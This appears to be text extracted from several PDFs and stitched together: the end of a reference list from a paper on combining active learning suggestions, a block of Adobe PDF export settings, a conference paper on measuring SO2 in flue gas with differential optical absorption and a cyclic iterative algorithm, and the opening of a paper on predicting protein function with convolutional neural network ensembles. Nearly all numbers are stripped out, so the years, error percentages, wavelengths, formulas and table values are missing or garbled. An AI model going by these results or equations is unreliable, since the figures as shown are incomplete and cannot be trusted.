decomain c, wrobel s. . active hidden markov models for information extraction. in: advances in intelligent data analysis. vol. . berlin/heidelberg: springer, – . schein ai, ungar lh. . active learning for logistic regression: an evaluation. machine learning ( ): – doi . /s - - - . schulze m. . a new monotonic, clone-independent, reversal symmetric, and condorcet- consistent single-winner election method. social choice and welfare ( ): – doi . /s - - - . seldin y, slivkins a. . one practical algorithm for both stochastic and adversarial bandits. in: proceedings of the st international conference on machine learning. bejing: pmlr, – . settles b. . active learning. synthesis lectures on artificial intelligence and machine learning ( ): – . settles b, craven m. . an analysis of active learning strategies for sequence labeling tasks. in: proceedings of the conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, – . shannon ce. . a mathematical theory of communication. bell system technical journal ( ): – . thompson wr. . on the likelihood that one unknown probability exceeds another in view of the evidence of two samples. biometrika ( – ): – doi . /biomet/ . - . . tran a. . photometric classification with thompson sampling. available at https://github.com/ chengsoonong/mclass-sky/blob/master/projects/alasdair/thesis/tran honours-thesis.pdf. xu z, akella r, zhang y. . incorporating diversity and density in active learning for relevance feedback. in: european conference on information retrieval. berlin/heidelberg: springer, – . tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /biomet/ . - . https://github.com/chengsoonong/mclass-sky/blob/master/projects/alasdair/thesis/tran honours-thesis.pdf https://github.com/chengsoonong/mclass-sky/blob/master/projects/alasdair/thesis/tran honours-thesis.pdf https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. combining active learning suggestions introduction overview of active learning combining suggestions experimental protocol results discussion conclusion appendix a: posterior balanced accuracy references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international conference on sensor network and computer engineering (icsnce ) research and application of so concentration monitoring algorithm in flue gas wang qinqin school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com su xiaohui school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com abstract—this paper mainly focuses on the concentration calculation of so in flue gas. there are many methods for smoke detection. first of all, this paper mainly introduces the basic differential optical absorption spectroscopy technology. then, in order to solve the problem of overlapping absorption between different gases in the flue gas, this paper use cyclic iteration algorithm to measure the concentration of so . it is concluded that the basic doas algorithm has a large error for the concentration measurement of mixed gas with overlapping absorption, the he error is above %. however, the cyclic iterative algorithm has a good effect on processing with it which can get a more stable result after three iterations, and the measurement error can be controlled finally within %. keywords-differential optical absorption spectroscopy; so monitoring; mixed gas; spectral overlap absorption; cyclic iterative algorithm i. introduction with the rapid development of industrialization and human destruction, their pollution is becoming more and more serious. therefore, monitoring the harmful gases of the atmosphere is the primary prerequisite for controlling and treating pollution. at present, people mainly use portable gas analysis equipment to carry on flue gas analyze, and the differential optical absorption spectroscopy (doas) is the most commonly and effective method which is used to real-time detect gas concentrations in the atmosphere by characteristic absorption of absorbable molecules in the near ultraviolet region[ ]. the traditional doas algorithm exist large errors for the gas concentration measurement of short path and low concentration. in order to decrease limit of detection and enhance environment adaptability of the portable flue gas analyzer, to improve measurement accuracy, wang kunpeng completed the research and design of portable gas analyzer based on avr micro-controller, and increase it’s detection accuracy and environmental adaptability[ ]. deng meng developed the portable gas analyzer based on the non- dispersive ultraviolet absorption, and has improved resolution and stability in high humidity and low concentration of so gas monitoring[ ].wang jing designed concentration calculation method based on the least square method on the basis of doas algorithm, which is used in the short optical path and a low so calculation[ ]. zhou mi proved the monitoring accuracy of fourier infrared method for the low concentration so in straw burning flue gas[ ]. yan yue’s experiment has proved that bp neural network based on adaboost optimization algorithm has a good effect in monitoring concentration of so gas with interference[ ]. in order to separate and calculate the gas concentration from the absorption spectrum signal of the mixed gas, xu shuping designed the portable smoke analyzer based on the cyclic iteration algorithm. it conclude that the method can simultaneously calculate various gas concentration and has strong anti-interference ability[ ]. wang yingjian designed strong independence and multi-scale wavelet discrete decomposition method, and obtained accurate concentration of so with no gas absorption interference [ ]. in the paper, a portable flue gas analyzer is used as an experimental instrument to study the method of measuring the so content in the exhaust emission of the factory. the international conference on sensor network and computer engineering (icsnce ) experiment mainly research on the doas absorption model and the cyclic iterative algorithm. it can get the efficient method on so concentration measurement in the mixed gas. so, it can provide the best technical support for the factory exhaust emission monitoring and reduce the air pollution. ii. differential absorption spectrometry differential absorption spectroscopy is proposed by u.platt of the institute of environmental physics at heidelberg university in germany. the basic principles are as follows: firstly, it need irradiate the tested substance with a beam of light, ten, select the corresponding absorption wavelength of the gas, lastly, calculate the gas absorbance and then get its concentration. the theory is based on the lambert-bee law. a. lambert-beer law the basic principle of lambert-beer law: when abeam of parallel monochromatic light through a certain absorbable material in the vertical direction and generate transmission, the medium itself will absorbs a part of light, so, the original intensity weakened, and the thicker the medium, the higher the concentration, the greater decreases the light intensity [ ]. the specific expression is as follows: klc i i a  log  among them, a is absorbance, i is the intensity of incident light, i is transmission light intensity, kis constant, absorption coefficient, lis the thickness of medium, c is the concentration of absorption material. set i (λ) as the original light intensity, i(λ) as receiving light intensity and σ(λ) as the absorption cross section of the gas to be measured, then the mathematical model of the spectral absorption of a single gas can be expressed as: )](exp[)()(   cli i  lambert-beer law is used only for the concentration measurement of single gas and it requires no interference in the experimental environment. however, in the actual measurement process, the measured material is usually a mixture materials which concluding kinds of interfere with the impurities such as sols and solid particles. b. actual spectral absorption model due to the uneven refractive index, when the light incident into the uneven medium, it will produce scattered light and reduce the transmittance of light, including rayleigh scattering and mie scattering which are show broadband absorption and narrowband absorption in the optical spectrum chart. therefore, it is necessary to establish a spectral absorption model under actual conditions. set i as the type of gas, and introduce the extinction coefficient of gas including  r and  m . the model of the gas absorb light is as follows:       ]exp[)()(   mriiclii    when analyzing and calculating, the absorption cross section will be decomposed into fast parts and slow parts. so, the high pass filtering will avoid the influence of rayleigh scattering and mie scattering. set the absorbance of the gas to be measured is d, the actual absorbance model is finally as follows:   )(])()(ln[   iici lid   from the formula , it can be known that the difference optical density  d is linear with the differential absorption cross section  i in a certain concentration range. although the differential absorption method can accurately calculate the concentration of most of the gases, the loss of the slow change absorption spectrum information in the filtering process will lead to produce some wrong results for gas concentration measurement. therefore, it is necessary to study other methods of concentration inversion to improve the measurement precision of gas composition. international conference on sensor network and computer engineering (icsnce ) iii. cyclic iterative algorithm the absorbance has superposition property. when the gases is used as a mixture, the total absorbance is equal to the sum of the absorbance of each component in the mixture if each kind of gas has a absorption of the light in a particular wavelength[ ]. according to the superposition property of absorption spectrum, the cyclic iteration algorithm can gradually eliminates the interference between gas molecules through successive cycle calculation, and finally approach the real concentration of the gas. c. the model of cyclic iterative algorithm the paper mainly research the concentration measurement of so of mixed gases with overlapping absorption characteristics. the experiment only consider the interference of no on spectral absorption of so in the range of nm~ nm band of the near ultraviolet region. two standard gases of so and no are added one by one, the absorption spectra of two kinds of gases are shown in figure . in te n si ty (c o u n ts ) wavelength(nm) 零气线 no so figure . absorption spectrogram of so and no . as shown in figure , although both no and so have the absorption of light at wavelength nm and nm, the absorption intensity is very different. the absorbance of no at nm is much greater than that of its absorbance at nm, while the absorbance of so at nm is much greater than that of its absorbance at nm [ ]. therefore, at nm, the absorption of no can be seen as the main absorption and the absorption of so as an interference. on the contrary, at the wavelength of nm, the absorption of so can be seen as the main absorption, and the absorption of no as the interference of the main absorption of so . the basic calculation steps of the cyclic iteration method are as follows: at nm, the total absorbance (a ) is considered as the absorbance of no (as ). step , at nm,according to as , it can obtain the concentration of no (cs ) by looking up the table; step , at nm, according to cs . it can obtain was to the absorbance of no (as ); step , at nm, the total absorbance (a ) minus as is equal to the absorbance of so (an ); step , at nm, it can obtain the concentration of so (cn ) by looking up the table; step , at nm,according to cn , it can obtain the absorbance of so (an ) by looking up the table; step , at nm, a minus an is equal to the absorbance of no (as ); repeat steps one to six, it can get the exact values of so concentration. the above algorithm flow can not only calculate the concentration of each component of the mixture gases which include so and no , but also it is suitable for concentration measurement of any mixed gas. iv. design of experimental system the experimental system is mainly composed of light source, spectrometer, optical fiber and computer. firstly, open the light source, and the emitted light of the optical fiber pass through a double convex lens, after that, it becomes parallel light and pass through the measured gas. next, the light enters into the spectrometer after focusing through the focusing lens. lastly, the spectrometer converts the optical signal into electrical signal and sends it to the computer to collect and process the spectral signal. the specific experimental device and system flow are shown in figure and figure . international conference on sensor network and computer engineering (icsnce ) figure . experimental device diagram. gas entry air chamber exhaust fume spectrometer computer uv light source optical fiber data line optical fiber figure . flow chart of the experimental system. in the experiment. firstly, it measured the dark spectrum when the light source does not pass into the spectrometer. then, add the gas and open the light source, so that the light can enter the air chamber through the optical fiber. after the gas was absorbed, the number of photons will decrease correspondingly, and the number of absorbed photons will change with the change of gas concentration. finally, the transmission light goes into the spectrometer, converts the light signal into the electrical signal, and sends it to the computer to display the spectrum. it can obtain original absorption spectrum after calculation the average value of absorption spectrum for many times. from the original spectra deducted the data of dark spectrum, it can get the actual spectrum. v. experimental reseaech and result analysis in order to verify the feasibility and practicability of doas and cyclic iteration algorithm, we will compare the result and accuracy of them through experiments, and summarize the advantages and disadvantages of each algorithm. d. research on curve fitting lambert-beer law provides a linear relationship between gas absorbance and concentration. in practice, the linear relationship is not always true due to the influence of various factors. therefore, the curve fitting method is used to fit the measured data. in order to improve the efficiency of the algorithm, the number of photons absorbed by the experiment is first converted into the absorption intensity. because the dark spectrum is included in the spectrum after the light is passed into the light source, therefore, in calculating the absorbance and concentration of the substance to be measured, the dark spectrum should be removed from the original spectrum. the calculation model of absorbance is as follows:   ds dr a    lg  among them, a is an absorbance, r is a number of incident photons, s is a number of transmitted photons,  is a wavelength, d is a dark noise. in this paper, the effect of no on the absorption spectrum of so is only considered. the mixture of no and so is used in the experiment, and there are two kinds of standard gas concentration, such as ppm and ppm. it can fit the concentration and absorbance curves of each gas at a certain wavelength by the measured gas absorption spectra, and then obtain the fitting data relation table of each gas. the fitting formula is as follows:  pccc c a ca i i i   i i i i  among them, p is the change rate of average absorbance along with increasing concentration, ci+ is the gas concentration, ia is a absorbance of gas to be measured. as long as there are two points ii ca   i i  ca on the measured curve, the relationship between concentration and absorbance can be fitted. at nm and nm,the relationship figures between concentration and absorbance of so and no can be obtained by using excel, respectively. as shown in figure and (horizontal coordinate is concentration, ordinate is absorbance). international conference on sensor network and computer engineering (icsnce ) figure . data relationship between concentration and absorbance of no . figure . data relationship between concentration and absorbance of so . e. experimental results and analysis in the experiment, firstly, we should turn off the light source and measure the dark spectrum. then, measure the original spectrum. finally, two kinds of mixed gas with different ratio of so and no are introduced to measure the spectral data. the mixed concentrations of so are ppm and ppm, respectively. the mixed concentrations of no are ppm and ppm, respectively. then, the concentration of the measured spectral data is respectively calculated by using doas and cyclic iterative algorithm. the so concentration under the interference of no as shown in table i. the iterative results of cyclic iteration algorithm are shown in table ii. table i. the comparison of measured concentration with actual values of so computational method standard value standard value measured value measured deviation(%) measured value measured deviation(%) doas . . % . . % cyclic iterative algorithm . . % . . % table ii. the results of cyclic iterative algorithm iterations st time nd time rd time th time firstgroup so (ppm) . . . . no (ppm) . . . . second group so (ppm) . . . . no (ppm) . . . . in the experiment, doas and cyclic iteration algorithms are used to invert the concentration of so in the mixture gas respectively. according to table i, under the interference of no gas, with the increase of no concentration, the greater the deviation, the lower the measurement accuracy. it is shown that the error is more than % when the doas method is used to measure the so concentration in the mixed gas. combined with table i and table ii, the results show that the inversion effect of doas method for the mixture gas concentration with overlapping absorption is not satisfactory. on the contrary, the accuracy of the cyclic iteration algorithm is the highest, and the content of the mixed components can be accurately measured international conference on sensor network and computer engineering (icsnce ) by only three cycles, and the measurement deviation is finally within %. vi. summary of the paper in order to find a method with high detection accuracy and good calculation efficiency, this paper mainly study the concentration monitoring method of so in flue gas. first, the advantages and disadvantages of the current equipment and algorithm of smoke composition detection can be obtained. then, the basis theoretical and calculation principle of doas are introduced in detail. next, according to the actual detection environment, a cyclic iterative algorithm is designed for the spectral absorption characteristics of measured gas. finally, the spectral data are obtained through experiments, and use the doas method and cyclic iteration algorithm to calculate the concentration of so . it is concluded that the cyclic iteration algorithm is superior to the content monitoring of so in flue gas, and greatly reduces the calculation deviation, finally control the error within %. the cyclic iteration algorithm is not only suitable for the concentration monitoring of the gas in the paper. it has a high accuracy for the detection of exhaust gas emissions in industrial production, especially for the concentration measurement of the of various components in the mixed gases with overlapping absorption spectra. the study results provide a good technology for industrial development and environmental protection. it make the factory exhaust gas to reach the safety target, and reduce the air pollution. acknowledgment provincial science and technology project, shaan’xi provincial education department project ( jf ). references [ ] sun liqun, chen kexin, yang huadong, “on-line detection of atmospheric trace gases based on differential absorption light spectrum,” j.applied optics, vol. , no. , jan. , pp. - . [ ] wang kunpeng, wang xianzhong, design of portable smoke detector based on avr microcontroller. d. zhengzhou: zhengzhou university, . [ ] deng meng. “application and research of portable flue gas analyzer based on non-dispersive ultraviolet absorption method in flue gas sulfur dioxide monitoring,” j. comprehensive utilization of chinese resources, vol. , no , feb. , pp. - . [ ] wang jing, huang yunbiao, “ the study on low concentration so on-line monitoring technology based on doas,” j.optics technology, vol. , no. , nov. , pp. - . [ ] zhou mi, yang xi, zhang minghui,“discussion on the monitoring method of sulfur dioxide in sinter smoke,” j.fine chemical intermediate, vol. , no. , apr. , pp. - . [ ] yan yue, yan shi, yang yongbin,jiang bin, “application ofadaboost integrated bp neural network in the detection of so concentration in thermal power plant,”transducer and micro-system technologies, vol. , no. , may. , pp. - . [ ] xu shuping, liu yushu,“a portable gas analyzer based on cyclic iterative algorithm,” j. journal of xi'an technological university, vol. , no. , jul. , pp. - . [ ] wang yingjian, feng hailiang,concentration monitoring of mixed gas of sulfur dioxide and nitricoxide based on uv absorption spectrum, d. chongqing: chongqing university, . [ ] jiang xuqian, wang qingbao, design of portable ultraviolet flue gas analyzer, d. nanjing: nanjing university of science and technology , . [ ] chen bin, wang zhihua, design of uv flue gas analyzer,d. nanjing: nanjing university of science and technology, . submitted august accepted june published july corresponding author evangelia i. zacharaki, evangelia.zacharaki@centralesupelec.fr academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright zacharaki distributed under creative commons cc-by . open access prediction of protein function using a deep convolutional neural network ensemble evangelia i. zacharaki center for visual computing, centralesupélec and galen team, inria saclay, france abstract background. the availability of large databases containing high resolution three- dimensional ( d) models of proteins in conjunction with functional annotation allows the exploitation of advanced supervised machine learning techniques for automatic protein function prediction. methods. in this work, novel shape features are extracted representing protein structure in the form of local (per amino acid) distribution of angles and amino acid distances, respectively. each of the multi-channel feature maps is introduced into a deep convolutional neural network (cnn) for function prediction and the outputs are fused through support vector machines or a correlation-based k-nearest neighbor classifier. two different architectures are investigated employing either one cnn per multi- channel feature set, or one cnn per image channel. results. cross validation experiments on single-functional enzymes (n= , ) from the pdb database achieved . % correct classification, demonstrating an improvement over previous results on the same dataset when sequence similarity was not considered. discussion. the automatic prediction of protein function can provide quick an- notations on extensive datasets opening the path for relevant applications, such as pharmacological target identification. the proposed method shows promise for structure-based protein function prediction, but sufficient data may not yet be available to properly assess the method’s performance on non-homologous proteins and thus reduce the confounding factor of evolutionary relationships. subjects bioinformatics, computational biology, data mining and machine learning keywords enzyme classification, function predition, deep learning, convolutional neural networks, structure representation introduction metagenomics has led to a huge increase of protein databases and the discovery of new protein families (godzik, ). while the number of newly discovered, but possibly redundant, protein sequences rapidly increases, experimentally verified functional annotation of whole genomes remains limited. protein structure, i.e., the d configuration of the chain of amino acids, is a very good predictor of protein function, and in fact a more reliable predictor than protein sequence because it is far more conserved in nature (illergård, ardell & elofsson, ). by now, the number of proteins with functional annotation and experimentally predicted structure of their native state (e.g., by nmr spectroscopy or x-ray how to cite this article zacharaki ( ), prediction of protein function using a deep convolutional neural network ensemble. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:\hfill \penalty -\@m evangelia.zacharaki@centralesupelec.fr mailto:\hfill \penalty -\@m evangelia.zacharaki@centralesupelec.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. crystallography) is adequately large to allow machine learning models to be trained that will be able to perform automatic functional annotation of unannotated proteins (amidi et al., ). also, as the number of protein sequences rapidly grows, the overwhelming majority of proteins can only be annotated computationally. in this work enzymatic structures from the protein data bank (pdb) are considered and the enzyme commission (ec) number is used as a fairly complete framework for annotation. the ec number is a numerical classification scheme based on the chemical reactions the enzymes catalyze, proven by experimental evidence (webb, ). there have been plenty machine learning approaches in the literature for automatic enzyme annotation. a systematic review on the utility and inference of various computational methods for functional characterization is presented in sharma & garg ( ), while a comparison of machine learning approaches can be found in yadav & tiwari ( ). most methods use features derived from the amino acid sequence and apply support vector machines (svm) (cai et al., ; han et al., ; dobson & doig, ; chen et al., ; zhou et al., ; lu et al., ; lee et al., ; qiu et al., ; wang et al., ; wang et al., ; amidi et al., ), k-nearest neighbor (knn) classifier (huang et al., ; shen & chou, ; nasibov & kandemir-cavas, ), classification trees/forests (lee et al., ; kumar & choudhary, ; nagao, nagano & mizuguchi, ; yadav & tiwari, ), and neural networks (volpato, adelfio & pollastri, ). in borgwardt et al. ( ) sequential, structural and chemical information was combined into one graph model of proteins which was further classified by svm. however, there has been little work in the literature on automatic enzyme annotation based only on structural information. a bayesian approach (borro et al., ) for enzyme classification using structure derived properties achieved % accuracy. amidi et al. ( ) obtained . % classification accuracy on , proteins from the pdb database when they used only structural information. in the past few years, deep learning techniques, and particularly convolutional neural networks, have rapidly become the tool of choice for tackling many challenging computer vision tasks, such as image classification (krizhevsky, sutskever & hinton, ). the main advantage of deep learning techniques is the automatic exploitation of features and tuning of performance in a seamless fashion, that simplifies the conventional image analysis pipelines. cnns have recently been used for protein secondary structure prediction (spencer, eickholt & cheng, ; li & shibuya, ). in spencer, eickholt & cheng ( ) prediction was based on the position-specific scoring matrix profile (generated by psi-blast), whereas in li & shibuya ( ) d convolution was applied on features related to the amino acid sequence. also, a deep cnn architecture was proposed in lin, lanchantin & qi ( ) to predict protein properties. this architecture used a multilayer shift-and-stitch technique to generate fully dense per-position predictions on protein sequences. to the best of the author’s knowledge, deep cnns have not been used for prediction of protein function so far. in this work the author exploits experimentally acquired structural information of enzymes and apply deep learning techniques in order to produce models that predict enzymatic function based on structure. novel geometric descriptors are introduced and the efficacy of the approach is illustrated by classifying a dataset of , enzymes from zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the pdb database into the l = primary categories: oxidoreductases (ec ), transferases (ec ), hydrolases (ec ), lyases (ec ), isomerases (ec ), ligases (ec ). the novelty of the proposed method lies first in the representation of the d structure as a ‘‘bag of atoms (amino acids)’’ which are characterized by geometric properties, and secondly in the exploitation of the extracted feature maps by deep cnns. although assessed for enzymatic function prediction, the method is not based on enzyme-specific properties and therefore can be applied (after re-training) for automatic large-scale annotation of other d molecular structures, thus providing a useful tool for data-driven analysis. in the following sections more details on the implemented framework are first provided, including the representation of protein structure, the cnn architecture and the fusion process of the network outputs. then the evaluation framework and the obtained results are presented, followed by some discussion and conclusions. methods data-driven cnn models tend to be domain agnostic and attempt to learn additional feature bases that cannot be represented through any handcrafted features. it is hypothesized that by combining ‘‘amino acid specific’’ descriptors with the recent advances in deep learning we can boost model performance. the main advantage of the proposed method is that it exploits complementarity in both data representation phase and learning phase. regarding the former, the method uses an enriched geometric descriptor that combines local shape features with features characterizing the interaction of amino acids on this d spatial model. shape representation is encoded by the local (per amino acid type) distribution of torsion angles (bermejo, clore & schwieters, ). amino acid interactions are encoded by the distribution of pairwise amino acid distances. while the torsion angles and distance maps are usually calculated and plotted for the whole protein (bermejo, clore & schwieters, ), in the current approach they are extracted for each amino acid type separately, therefore characterizing local interactions. thus, the protein structure is represented as a set of multi-channel images which can be introduced into any machine learning scheme designed for fusing multiple d feature maps. moreover, it should be noted that the utilized geometric descriptors are invariant to global translation and rotation of the protein, therefore previous protein alignment is not required. our method constructs an ensemble of deep cnn models that are complementary to each other. the deep network outputs are combined and introduced into a correlation- based knn classifier for function prediction. for comparison purposes, support vector machines were also implemented for final classification. two system architectures are investigated in which the multiple image channels are considered jointly or independently, as will be described next. both architectures use the same cnn structure (within the highlighted boxes) which is illustrated in fig. . representation of protein structure the building blocks of proteins are amino acids which are linked together by peptide bonds into a chain. the polypeptide folds into a specific conformation depending on the interactions between its amino acid side chains which have different chemistries. zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the deep cnn ensemble for protein classification. in this framework (architecture ) each multi-channel feature set is introduced to a cnn and results are combined by knn or svm classification. the network includes layers performing convolution (conv), batch normalization (bnorm), rectified lin- ear unit (relu) activation, dropout (optionally) and max-pooling (pool). details are provided in ‘classi- fication by deep cnns’. many conformations of this chain are possible due to the rotation of the chain about each carbon (cα) atom. for structure representation, two sets of feature maps were used. they express the shape of the protein backbone and the distances between the protein building blocks (amino acids). the use of global rotation and translation invariant features is preferred over features based on the cartesian coordinates of atoms, in order to avoid prior protein alignment, which is a bottleneck in the case of large datasets with proteins of several classes (unknown reference template space). the feature maps were extracted for every amino acid being present in the dataset including the standard amino acids, as well as asparagine/aspartic (asx), glutamine/glutamic (glx), and all amino acids with unidentified/unknown residues (unk), resulting in m= amino acids in total. torsion angles density the shape of the protein backbone was expressed by the two torsion angles of the polypeptide chain which describe the rotations of the polypeptide backbone around the bonds between n-cα (angle φ) and cα-c (angle ψ). all amino acids in the protein were grouped according to their type and the density of the torsion anglesφ andψ(∈[− , ]) was estimated for each amino acid type based on the d sample histogram of the angles (also known as ramachandran diagram) using equally sized bins (number of bins ha= ). the histograms were not normalized by the number of instances, therefore their values indicate the frequency of each amino acid within the polypeptide chain. in the obtained feature maps (xa), with dimensionality [ha×ha×m], the number of amino acids (m) corresponds to the number of channels. smoothness in the density function was achieved by moving average filtering, i.e., by convoluting the density map with a d gaussian kernel (σ = . ). zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. density of amino acid distances for each amino acid ai,i= ,...,m, distances to amino acid aj,j= ,...,m, in the protein are calculated based on the coordinates of the cα atoms for the residues and stored as an array dij. since the size of the proteins varies significantly, the length of the array dij is different across proteins, thus not directly comparable. in order to standardize measurements, the sample histogram of dij is extracted (using equally sized bins) and smoothed by convolution with a d gaussian kernel (σ = . ). the processing of all pairs of amino acids resulted in feature maps (xd) of dimension [m×m×hd], where hd = is the number of histogram bins (considered as number of channels in this case). classification by deep cnns feature extraction stage of each cnn the cnn architecture employs three computational blocks of consecutive convolutional, batch normalization, rectified linear unit (relu) activation, dropout (optionally) and max-pooling layers, and a fully-connected layer. the convolutional layer computes the output of neurons that are connected to local regions in the input in order to extract local features. it applies a d convolution between each of the input channels and a set of filters. the d activation maps are calculated by summing the results over all channels and then stacking the output of each filter to produce the output d volume. batch normalization normalizes each channel of the feature map by averaging over spatial locations and batch instances. the relu layer applies an element-wise activation function, such as the max( ,x) thresholding at zero. the dropout layer is used to randomly drop units from the cnn during training to reduce overfitting. dropout was used only for the xa feature set. the pooling layer performs a downsampling operation along the spatial dimensions in order to capture the most relevant global features with fixed length. the max operator was applied within a [ × ] neighborhood. the last layer is fully-connected and represents the class scores. training and testing stage of each cnn the output of each cnn is a vector of probabilities, one for each of the l possible enzymatic classes. the cnn performance can be measured by a loss function which assigns a penalty to classification errors. the cnn parameters are learned to minimize this loss averaged over the annotated (training) samples. the softmax loss function (i.e., the softmax operator followed by the logistic loss) is applied to predict the probability distribution over categories. optimization was based on an implementation of stochastic gradient descent. at the testing stage, the network outputs after softmax normalization are used as class probabilities. fusion of cnn outputs using two different architectures two fusion strategies were implemented. in the first strategy (architecture ) the two feature sets, xa and xd, are each introduced into a cnn, which performs convolution at all channels, and then the l class probabilities produced for each feature set are combined into a feature vector of length l∗ . in the second strategy (architecture ), each one of the (m= or hd = ) channels of each feature set is introduced independently into a cnn and the obtained class probabilities are concatenated into a vector of l∗m features for xa 